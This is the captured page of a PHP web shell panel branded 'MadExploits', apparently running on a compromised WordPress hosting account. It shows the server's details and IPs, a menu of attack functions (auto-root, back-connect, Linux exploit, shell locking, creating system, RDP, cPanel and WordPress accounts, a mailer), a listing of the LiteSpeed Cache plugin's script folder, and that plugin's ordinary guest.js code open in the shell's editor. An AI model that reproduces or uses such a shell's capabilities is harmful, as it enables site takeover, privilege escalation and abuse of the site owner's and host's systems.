Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.149.214.52
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
litespeed-cache /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
babel.min.js
772.69
KB
-rw-r--r--
component.cdn.js
6.34
KB
-rw-r--r--
component.crawler.js
2.93
KB
-rw-r--r--
css_async.js
1.45
KB
-rw-r--r--
css_async.min.js
1.32
KB
-rw-r--r--
guest.docref.js
247
B
-rw-r--r--
guest.docref.min.js
215
B
-rw-r--r--
guest.js
740
B
-rw-r--r--
guest.min.js
373
B
-rw-r--r--
instant_click.min.js
4.52
KB
-rw-r--r--
instant_click.ori.js
16.31
KB
-rw-r--r--
iziModal.min.js
25.65
KB
-rw-r--r--
js_delay.js
2.67
KB
-rw-r--r--
js_delay.min.js
1.65
KB
-rw-r--r--
lazyload.init.js
823
B
-rw-r--r--
lazyload.lib.js
24.89
KB
-rw-r--r--
lazyload.min.js
8.12
KB
-rw-r--r--
litespeed-cache-admin.js
16.44
KB
-rw-r--r--
react.min.js
128.93
KB
-rw-r--r--
webfontloader.js
12.21
KB
-rw-r--r--
webfontloader.min.js
11.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : guest.js
var litespeed_vary = document.cookie.replace(/(?:(?:^|.*;\s*)_lscache_vary\s*\=\s*([^;]*).*$)|^.*$/, '$1'); if (!litespeed_vary) { // Note: as the vary may be changed in Login Cookie option, even the visitor doesn't have this cookie, it doesn't mean the visitor doesn't have the vary, so still need PHP side to decide if need to set vary or not. fetch('litespeed_url', { method: 'POST', cache: 'no-cache', redirect: 'follow', }) .then(response => response.json()) .then(data => { console.log(data); if (data.hasOwnProperty('reload') && data.reload == 'yes') { // Save doc.ref for organic traffic usage sessionStorage.setItem('litespeed_docref', document.referrer); window.location.reload(true); } }); }
Close